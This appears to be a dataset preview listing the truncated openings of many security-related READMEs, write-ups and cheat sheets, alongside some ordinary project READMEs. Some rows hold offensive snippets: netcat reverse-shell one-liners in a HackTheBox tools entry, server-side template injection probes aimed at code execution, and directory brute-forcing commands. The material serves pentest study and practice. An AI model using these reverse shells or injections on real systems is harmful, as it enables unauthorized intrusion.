text
stringlengths
9
334k
# Node Version Manager [![Build Status](https://travis-ci.org/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.35.1-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)...
# Swagger Code Generator - Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Templat...
# Web Enumeration ## Dirb Default wordlist `dirb http://target_site.com` Wordlist `dirb http://target_site.com /usr/share/wordlist/dirbuster/WORDLIST` Extensions `dirb http://target_site.com -X .php,.txt,.bak,.old` ## Gobuster `gobuster -w /usr/share/wordlists/dirb/common.txt -u TARGET` ## Nikto `nikto -h T...
# Awesome Forensics [![Link Status](https://github.com/cugu/awesome-forensics/workflows/CI/badge.svg)](https://github.com/cugu/awesome-forensics) Curated list of awesome **free** (mostly open source) forensic analysis tools and resources. - Awesome Forensics - [Collections](#collections) - [Tools](#tools) - [...
# ToolsRus - What directory can you find, that begins with a "g"? - Considering using Scilla `scilla dir -target <TARGET_IP>` - `guide*****` - Whose name can you find from this directory? - `bob` - What directory has basic authentication? - `pro******` - What is bob's password to the protected part of the we...
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) on the Wifi Devboard! Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) (WIP for Windows too including full automated downloads.) Looking for...
--- title: "Nuclei" category: "scanner" type: "Website" state: "released" appVersion: "v2.6.5" usecase: "Nuclei is a fast, template based vulnerability scanner." --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This fil...
# Swagger Code Generator - Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Templat...
# Command Mobile Penetration Testing Cheatsheet The things what you should know about android :) </br> For iOS application please check [iOS Pentest Cheatsheet](https://github.com/mirfansulaiman/Command-Mobile-Penetration-Testing-Cheatsheet/blob/master/ios-cheatsheet.md).</br> ## ADB Cheatsheet Download adb http://adb...
# ASIS CTF Quals 2018 **It's recommended to read our responsive [web version](https://balsn.tw/ctf_writeup/20180429-asisctfquals/) of this writeup.** - [ASIS CTF Quals 2018](#asis-ctf-quals-2018) - [Web](#web) - [Nice code (unsolved, written by bookgin)](#nice-code-unsolved-written-by-bookgin) - [Bug ...
# SecTalks LON0x27 - dxw.ninja CTF writeup > So i've heard you like cyberpunk. Let's play a game. > > The rules are simple: hack your way through the Tessier-Ashpool Corporation mainframe and find the secrets. > > To get started, telnet* to dxw.ninja on port 2323 and register an account. > > Telnet is used for accou...
# Web Application Firewall (WAF) An ongoing & curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Web Application Firewall (WAF) in Cybersecurity. > Than...
# PENTESTING-BIBLE # Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password...
# Notes 1. General port information 2. General ideas 3. General attack vectors 4. PortSwigger's Web Security Academy. 5. Linux privilege escalation and the sudoers file 6. General notes on bounty hunting 7. CTFs # General Ideas ## Privesc - **cron** joins repeat regularly. Can you fit something there? - ...
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the...
# Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty Here You can find the writeups of all the bugs that was awesome. - [XSSI](#xssi) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [Brute Force](#bru...
# Jerry URL: https://app.hackthebox.com/machines/Jerry Level: Easy Date 2 Jun 2020 ## Walkthrough - [Enumeration](#enumeration) # Enumeration ## NMAP We found port 8080/TCP, Tomcat. We search on Google for default password: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Pass...
# YAPS - **Y**et **A**nother **P**HP **S**hell Yeah, I know, I know... But that's it. =) As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (`nc -lp 1337`). In t...
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https:/...
This contains the write-ups from the Internet. Index | Reconnaissancece/Methodology --- | --- **1** | [How To Do Your Reconnaissance](https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-) **2** | [My Guide to Basic Reckon](https://blog.securitybreached.org/2017/11/25/guide-to-basic-recon-for-bu...
# Introduction ## The OWASP Testing Project The OWASP Testing Project has been in development for many years. The aim of the project is to help people understand the *what*, *why*, *when*, *where*, and *how* of testing web applications. The project has delivered a complete testing framework, not merely a simple check...
# Web Hacking ## Resources https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html https://github.com/EdOverflow/can-i-take-over-xyz#all-entries https://highon.coffee/blog/lfi-cheat-she...
# AllThingsSSRF **This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location** This is currently work in progress I will add more resources as I find them. ![SSRF Logo](/images/ssrf.jpg) ### Created By [@jdonsec](https://twitter.com/jdonsec) --- #### Learn What is SSRF - [Vickie ...
<p align="center"> <img src="https://avatars.githubusercontent.com/u/55242164?s=400"> </p> <h2 align="center"> Lockdoor v2.3</h2> # Table of contents - [Table of contents](#table-of-contents) - [Changelog 📌 :](#changelog---) - [Badges 📌 :](#badges--) - [Support me 💰 :](#support-me--) - [Contributors ⭐ :](#con...
# EarlyAccess - HackTheBox - Writeup Linux, 40 Base Points, Hard ![info.JPG](images/info.JPG) ## Machine ![‏‏EarlyAccess.JPG](images/EarlyAccess.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80``` and ```443```. ***User 1***: By login to ...
# List of InfoSec resources I get this question a lot so I compiled a big list that I can just link people to directly. # Where to start? - [How to start hacking? The ultimate two path guide to information security. - /r/hacking](https://www.reddit.com/r/hacking/comments/a3oicn/how_to_start_hacking_the_ultimate_two_...
# OSCE³ and OSEE Study Guide [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) ## OSWE ### Content - Web security tools and methodologies - Source code analysis - Persistent cross-site scripting - Session hijack...
# Sobre esse repositório - Esse repositório foi criado por mim [Fernanda Souza](https://github.com/leitoraincomum) com o intuito de divulgar ferramentas gratuitas que possam auxiliar pessoas em seus estudos. - Se conhece alguma que não está listada, faça fork desse repositório e abra uma solicitação de alteração (pull ...
# pixies --- ###### edicoes * 0 * Socket Sem Bloqueio * HackTheBox Nibbles WriteUp * HackTheBox Valetine WriteUp * Empire Powershell & c&c redirector * Rice - O que é? * 1 * complete_MysqlInjection_intro.m * howto_setup-tor-hiddenservice-using-docker.md * poc_torbrowser7-noscript-bypass...
# #noshitsecurity ## sincera's list <table width="100%" bgcolor="#324F61" border="0" bordercolor="#324F61" cellspacing="0" cellpadding="3"> <tbody> <tr> <th align="left" scope="row"><h3>BLOGS</h3></th> </tr> </tbody> </table> <ul> <li><a href="#" target="_blank">Abatchy's blog</a...
# linWinPwn - Active Directory Vulnerability Scanner ## Description linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomain...
## 2018 Facebook Bug Bounty Write-ups * http://whitehatstories.blogspot.com/2018/03/setting-up-tests-for-any-app-or-pixel.html * http://whitehatstories.blogspot.com/2018/04/hi-this-post-is-regarding-one-of-my.html * http://whitehatstories.blogspot.com/2018/05/how-i-could-have-made-your-products-out.html * http://www.as...
<p align="center"><img src="img/banner.png" alt="Banner"></img></p> <p align="center">Machine creator: <a href="https://app.hackthebox.com/profile/485024">z9fr</a></p> [![f4T1H21](https://www.hackthebox.eu/badge/image/184235)](https://app.hackthebox.eu/profile/184235) <br> <a href="https://www.buymeacoffee.com/f4T1H21...
![](proper_banner.png) <p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" src="https://www.hackthebox.eu/badge/image/391067"></a> </p> # Enumeration **IP-ADDR:** 10.10.10.231 proper.htb **nmap scan:** ```bash PORT STATE SERVICE VERSIO...
[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURAT...
# Awesome Burp Extensions [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of amazingly awesome Burp Extensions # Contributing [Please refer to the contributing guide for details](CONTRIBUTING.md...
# HackTheBox Boxes ![ARZ](https://www.hackthebox.eu/badge/image/283411) ## Very Easy Box | OS --- | ...
# Bug-Bounty-n00b ( Yet to organize! Will Update Soon. ) That tweet is only intended for Beginners/Freshers in bug bounty hunting who just started learning about this or want to start! If you are already doing hunting or doing labs then Maybe this won't be too much helpful to you. Thanks! It all depends on interest a...
<p align="center"><a href="https://github.com/Lissy93/awesome-privacy"><img src="https://i.ibb.co/80Y5x2T/Awesome-Privacy.png" /></a></p> *<p align="center">A curated list of privacy & security-focused apps, software, and providers 🔐</p>* [⏬ Skip to Content ⏬](#password-managers) ## Intro [![Awesome](https://awesom...
# Awesome Drupal [![Awesome Badge](https://awesome.re/badge.svg)](https://awesome.re)<!-- omit from toc --> [<img src="drupal.svg" align="right" height="50">](https://www.drupal.org/about) > A collection of awesome(\*) resources, tools, books, examples etc for [Drupal CMS](https://www.drupal.org/). Mainly focused on ...
# awesome-mobile-CTF This is a curated list of mobile based CTFs, write-ups and vulnerable mobile apps. Most of them are android based due to the popularity of the platform. Inspired by [android-security-awesome](https://github.com/ashishb/android-security-awesome), [osx-and-ios-security-awesome](https://github.com/a...
![Reconnnoitre](https://github.com/codingo/Reconnoitre/blob/master/tank-152362_640.png) A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to execut...
# Swagger Code Generator - Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Templat...
## Useful Websites [offical exam guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) <br> [offical exam report](https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf) <br> [pentest.ws](https://pentest.ws): note taking <br> [Burp Suite](https://portswigger.net/bur...
**Cybersecurity/Bugbounty Practice Platform** This section contains Practice paltforms for CTF's, Atatck-defence, pentesting and Bugbounty platfroms lists to submite Bugs. Index | Title ------| ------ **1** | [CTF Practice Platforms](/BugBountyCheatSheet/CTFPlatforms.md) **2** | [Bug Bounty Platforms](/BugBountyChea...
# Web Attack Cheat Sheet ## Table of Contents - [Discovering](#discovering) - [Targets](#targets) - [IP Enumeration](#ip-enumeration) - [Subdomain Enumeration](#subdomain-enumeration) - [Wayback Machine](#wayback-machine) - [Cache](#cache) - [Crawling](#crawling) - [Wordlist](#wordlist) - [Directory Br...
### TensorFlow Makefile The recommended way to build TensorFlow from source is using the Bazel open-source build system. Sometimes this isn't possible. For example, if you are building for iOS, you currently need to use the Makefile. - The build system may not have the RAM or processing power to support Bazel. - Ba...
# Obscurity Writeup (HTB box) ## AUTHOR: bytevsbyte Twitter: [@bytevsbyt3](https://twitter.com/bytevsbyt3) HTB Profile: [bytevsbyte](https://www.hackthebox.eu/profile/27835) ## TL;DR This is a straightforward linux machine of 30 points on HackTheBox platform. The box has only two ports open, require a little enumer...
# InfosecBookmarks > Organizando os bookmarks que acumulei no Chrome - [Bug Bounty](#bug-bounty) - [Methodology](#methodology) - [WebHacking](#webhacking) - [Recon](#recon) - [Tools](#tools) - [Awesome Lists](#awesome-lists) - [Bugs](#bugs) - [Finding Subdomain Takeover](#finding-su...
# Precious - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Precious.JPG](images/Precious.JPG) ## TL;DR To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`. ***User 1***: By executing the `exiftool` command on the ...
# Track Awesome Ctf Updates Daily A curated list of CTF frameworks, libraries, resources and softwares [🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/apsdehal/awesome-ctf/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com...
This is only for information about top 500 + hacking tools in termux and Linux 👉[![Instagram ](https://img.shields.io/badge/INSTAGRAM-FOLLOW-red?style=for-the-badge&logo=instagram)](https://www.instagram.com/shubhamg0sai)👈 - [phone number tracker](https://github.com/shubhamg0sai/phone-number-tracker) - informatio...
# SQLmap Tamper-API It's an API for SQLmap tamper scripts allows you to use your favorite programming language to write your tamper scripts. This API solves SQLmap limitation of accepting only python to write tamper scripts. ## How it works **`taper-api.py`** script sends the **payload** and **kwargs** in a JSON form...
Gobuster v1.3 (OJ Reeves @TheColonial) ====================================== Gobuster is a tool used to brute-force: * URIs (directories and files) in web sites. * DNS subdomains (with wildcard support). ### Oh dear God.. WHY!? Because I wanted: 1. ... something that didn't have a fat Java GUI (console FTW). 1. ....
<p align="center"> <img src="https://user-images.githubusercontent.com/18099289/56750563-558a9400-6784-11e9-8175-ee2a19ee9d75.png" width="300px"> </p> </br> KeyHacks shows ways in which particular API keys found on a Bug Bounty Program can be used, to check if they are valid. @Gwen001 has scripted the entire proces...
- [seeker](https://github.com/thewhiteh4t/seeker) - Accurately Locate Smartphones using Social Engineering.[![->](https://img.shields.io/github/stars/thewhiteh4t/seeker.svg?style=social&label=Star&maxAge=2592000)](https://github.com/thewhiteh4t/seeker/stargazers/) - [ANDRAX](https://andrax.thecrackertechnology.com/down...
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the...
--- title: "Nuclei" category: "scanner" type: "Website" state: "released" appVersion: "v2.5.7" usecase: "Nuclei is a fast, template based vulnerability scanner." --- <!-- SPDX-FileCopyrightText: 2021 iteratec GmbH SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is ge...
<!--Satırların sonundaki "\" işareti bir alt satıra geçirmek için kullanılıyor. Kullanmazsanız linkler birbirine girebilir. --> ## LuNiZz Sıkça Sorulan Sorular Sayfasına Hoş Geldin! > ### Başlamadan Önce > [![Visitor](https://visitor-badge.laobi.icu/badge?page_id=LuNiZz.siber-guvenlik-sss)](#) > > - Twitch Yayın Akışı ...
<p align="center"><h1>🧠 Awesome ChatGPT Prompts</h1></p> [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [![Steamship](https://raw.githubusercontent.com/steamship-core/python-client/main/badge.svg)](https://www...
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) [![maven](https://img.shields.io/m...
# Tools - Tools that I use during pentest `tools.md` #### Windows and Active Directory | Tool | Use | Command Syntax | | ---- | --- | -------------- | | [Bloodhound.py](https://github.com/fox-it/BloodHound.py) | BloodHound written in python. Used to obtain AD infromations from a windows machine | `python3 bloodhound-...
# Installation Netdata is a **monitoring agent**. It is designed to be installed and run on all your systems: **physical** and **virtual** servers, **containers**, even **IoT**. The best way to install Netdata is directly from source. Our **automatic installer** will install any required system packages and compile N...
# Web Scanning - Deploy the machine! no answer needed - First and foremost, what switch do we use to set the target host? - `-h` - Websites don't always properly redirect to their secure transport port and can sometimes have different issues depending on the manner in which they are scanned. How do we disable ...
# Web Development Security ****** ## Getting Started - [Hackerone Hacker101](https://www.hackerone.com/hacker101) - [Bugcrowd University](https://www.bugcrowd.com/hackers/bugcrowd-university/) - [OWASP Top 10 Explained by detectify](https://www.youtube.com/playlist?list=PLbKl_RtocZetEzdHyZCgZHwaUHjE_jeQT) - [Web Sec...
# Awesome OSINT [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [<img src="https://github.com/jivoi/awesome-osint/raw/master/osint_logo.png" align="right" width="100">](https://github.com/jivoi/awesome-osint) A...
[![Sn1perSecurity](https://sn1persecurity.com/images/Sn1perSecurity-Attack-Surface-Management-header2.png)](https://sn1persecurity.com) [![GitHub release](https://img.shields.io/github/release/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/releases) [![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg...
--- description: Embrace your dark side ... cover: .gitbook/assets/wallpaperflare.com_wallpaper.jpg coverY: -22.925373134328254 --- # 📕 The Red Book {% hint style="info" %} 🐙 [GitHub](https://github.com/insecurecodes) 🌐[insecure.codes](https://www.insecure.codes/) 🕵️ [About me](https://rtm.codes/) {% endhint %} ...
# awesome-cybersec [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) ![](https://img.shields.io/badge/Contribuitions-Welcome-brightgreen) A collection of awesome platforms, blogs, documents, books, resources and ...
# SSTI (Server Side Template Injection) > Tool tplmap ## Test ``` {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}} #{7*7} ``` 47 -> system is vulnerable ## Get server info {{g}} {{self}} {{request}} {{config}} ## function that can be called for RCE {{url_for}} {{[].__class__.__base__.__subcl...
# Node.js Node.js is an open-source, cross-platform JavaScript runtime environment. For information on using Node.js, see the [Node.js website][]. The Node.js project uses an [open governance model](./GOVERNANCE.md). The [OpenJS Foundation][] provides support for the project. Contributors are expected to act in a c...
# BugBountyScanner [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/chvancooten/BugBountyScanner/main.yml)](https://github.com/chvancooten/BugBountyScanner/actions) [![Docker Pulls Badge](https://img.shields.io/docker/pulls/chvancooten/bugbountyscanner)](https://hub.docker.com/r/chvanco...
## 👑 What is KingOfBugBounty Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understandi...
# Practical Network Penetration Tester Certification (PNPT) Originally for the OSCP. Now for the PNPT certification test. for a lot of reasons including cost, ability to retest for free, and lack of software restrictions. https://certifications.tcm-sec.com/pnpt/ # ABOUT THE PNPT EXAM The PNPT certification exam is a...
## Description The **WPScan** CLI tool is a free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test the security of their sites. The WPScan CLI tool uses our database of 26,336 WordPress vulnerabilities. ## Cheatsheet ### Non-intrusive scan ```...
# Shocker URL: https://app.hackthebox.com/machines/Shocker Level: Easy Date 28 Aug 2021 ## Walkthrough - [Enumeration](#enumeration) - [User flag](#user-flag) - [Privesc](#privesc) # Enumeration ## NMAP ``` # Nmap 7.91 scan initiated Sat Aug 28 17:11:01 2021 as: nmap -T4 -p- -oN 01_nmap 10.10.10.56 Nmap scan re...
# HackTheBox Boxes ![ARZ](https://www.hackthebox.eu/badge/image/283411) ## Very Easy Box | OS --- | ...
# Meta(Facebook) BugBounty-Writeups Inspired from [xdavidhu](https://github.com/xdavidhu/awesome-google-vrp-writeups) & [1hack0](https://github.com/1hack0/Facebook-Bug-Bounty-Write-ups) this is a repo which contains Facebooks Updated BugBounty Writeups. ## Contributing: If you have/know of any Facebook writeups not...
# Templated > Upon accessing the web instance, we will see this interface ``` Site still under construction Proudly powered by Flask/Jinja2 ``` The message already informs us that the page is built using Flask / Jinja2. To test this further, I will introduce routes in the url. I got a `404` error but notice what we...
# k0st/alpine-nikto Dockerized nikto Image is based on the [gliderlabs/alpine](https://registry.hub.docker.com/u/gliderlabs/alpine/) base image ## Docker image size [![Latest](https://badge.imagelayers.io/k0st/alpine-nikto.svg)](https://imagelayers.io/?images=k0st/alpine-nikto:latest 'latest') ## Docker image usag...
# PENTESTING-BIBLE # Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password...
# Phase 5: Cloud Security Fundamentals Author: [Dayspring Johnson](https://twitter.com/daycyberwox) ## How does this phase apply to Cloud? Security is the biggest challenge to cloud computing. As cloud adoption continues to grow, cloud security incidents and vulnerabilities are equally on the rise. The individual c...
[![Build Status](https://travis-ci.org/ytdl-org/youtube-dl.svg?branch=master)](https://travis-ci.org/ytdl-org/youtube-dl) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURATION](#configuration) - [OUTP...
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.11-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects...
# Security Resources > John Hammond & Cybersecurity Community | September 14th, 2021 ------------------------------------------------ This is a living document to host and contain links and resources for online wargames, practice environments, and activities to learn new things in cybersecurity. <!-- --------------...
--- title: 'WPScan' category: 'scanner' type: "CMS" state: "released" appVersion: "v3.8.24" usecase: "Wordpress Vulnerability Scanner" --- ![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png) <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier...
# Trick - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Trick.JPG](images/Trick.JPG) ## Trick is still an active machine - [Full writeup](Trick-Writeup.pdf) available with root hash password only. Telegram: [@evyatar9](https://t.me/evyatar9) Discord: [evyatar9#5800]...
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understan...
<p align="center"> <img width="300" height="300" src="https://github.com/bigb0sss/OSCE/blob/master/osce.png"> </p> ## Exploit Writeups * Backdooring PE - [Weaponizing Your Favorite PE](https://medium.com/@bigb0ss/expdev-weaponizing-your-favorite-pe-portable-executable-exploit-c268c0c076c7) * SEH + Egghunter(Manual E...
# Hackthebox tools **shell.php and shell.ps1** : Use for reverse shell when uploaded to vuln machine ```shell # Listen for reverse shell nc -lnvp <port number> # Use netcat for reverse shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip address> <port> >/tmp/f # or this nc -e /bin/sh <ip address> <port> ``...
# Explore - HackTheBox - Writeup Android, 20 Base Points, Easy ## Machine ![‏‏Explore.JPG](images/Explore.JPG) ### TL;DR; To solve this machine, we begin by enumerating open services – finding the ports ```2222```,```5555```,```33897```,```42135``` and ```59777```. ***User:*** Found related ports of [ES File Explo...
Please don't hesitate to contribute to this repo! # Bug Bounty Beginner's Roadmap Hi! I'm **Ansh Bhawnani**. I am currently working as a Security Engineer and also a part time content creator. I am creating this repository for everyone to contribute as to guide the young and enthusiastic minds for starting their care...
--- title: "Nikto" category: "scanner" type: "Webserver" state: "released" appVersion: "2.5.0" usecase: "Webserver Vulnerability Scanner" --- ![nikto logo](https://cirt.net/files/alienlogo_3.gif) <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. ----...
# Official info The Wifi devboard ships with [Blackmagic firmware](https://github.com/flipperdevices/blackmagic-esp32-s2) installed. The Flipper documentation [is here](https://docs.flipperzero.one/development/hardware/wifi-debugger-module), and Blackmagic is [over here](https://black-magic.org/). Quick start: Connec...
### IP `10.10.207.236` # Enumeration ### nmap `nmap -sC -sV 10.10.207.236 -o BountyHacker.nmap` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 23:53 EST Nmap scan report for 10.10.207.236 Host is up (0.17s latency). Not shown: 967 filtered ports, 30 closed ports PORT STATE SERVICE VERSION 21/tcp open ft...
# Welcome to the Pentesting-Methodology ## Networking | slash notation | net mask | hex | binary representation | number of hosts | |----------------|-----------------|------------|-------------------------------------|-----------------| | /0 | 0.0.0.0 | 0x00000000 | 000...
<details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</stro...
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.7"> <img src="https://...
# PENTESTING-BIBLE *Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.* ![Twitter URL](https://img.shields.io/twitter/url?url=https%3A%2F%2Ftwitter.com/cry__pto?style=social) ![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg?url=https://paypal.me/AmmarAmerHacker) <details> <...
# Getting into Cybersecurity A concentrated list of Cybersecurity resources to help anyone interested in learning more about cybersecurity. Link to GoVanguard’s full list of tools and resources is located at the bottom of the page. Cybersecurity: What It Is and Why It Matters -----------------------------------------...